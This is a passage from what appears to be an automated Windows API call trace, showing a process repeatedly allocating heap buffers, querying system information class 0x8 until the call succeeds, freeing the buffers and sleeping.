0x285a678 [0242.058] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.058] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0242.058] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0242.058] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.058] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0242.059] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0242.059] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.059] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0242.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.093] Sleep (dwMilliseconds=0x110) [0242.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0242.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0242.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0242.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0242.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0242.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0242.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0242.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0242.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.112] Sleep (dwMilliseconds=0x110) [0242.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0242.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0242.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0242.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0242.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0242.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0242.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0242.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0242.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.126] Sleep (dwMilliseconds=0x110) [0242.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0242.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0242.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0242.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0242.165] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0242.165] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0242.166] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0242.166] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0242.166] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.167] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.167] Sleep (dwMilliseconds=0x110) [0242.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0242.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0242.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0242.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0242.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0242.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0242.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0242.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0242.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.177] Sleep (dwMilliseconds=0x110) [0242.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0242.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0242.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0242.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0242.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0242.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0242.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0242.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0242.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.188] Sleep (dwMilliseconds=0x110) [0242.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0242.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0242.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0242.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0242.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0242.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0242.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0242.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0242.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.203] Sleep (dwMilliseconds=0x110) [0242.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0242.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0242.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0242.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0242.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0242.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0242.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0242.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0242.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.222] Sleep (dwMilliseconds=0x110) [0242.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0242.231] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0242.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0242.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0242.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0242.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0242.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0242.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0242.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.237] Sleep (dwMilliseconds=0x110) [0242.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0242.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0242.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0242.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0242.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0242.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0242.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0242.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0242.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.254] Sleep (dwMilliseconds=0x110) [0242.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0242.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0242.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0242.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0242.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0242.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0242.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0242.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0242.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.269] Sleep (dwMilliseconds=0x110) [0242.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0242.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0242.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0242.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0242.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0242.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0242.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0242.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0242.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.286] Sleep (dwMilliseconds=0x110) [0242.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0242.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0242.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0242.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0242.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0242.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0242.305] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0242.305] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.306] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0242.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.312] Sleep (dwMilliseconds=0x110) [0242.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0242.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0242.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0242.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0242.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0242.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0242.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0242.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0242.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0242.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0242.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0242.333] Sleep (dwMilliseconds=0x110) [0242.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0242.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0242.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: 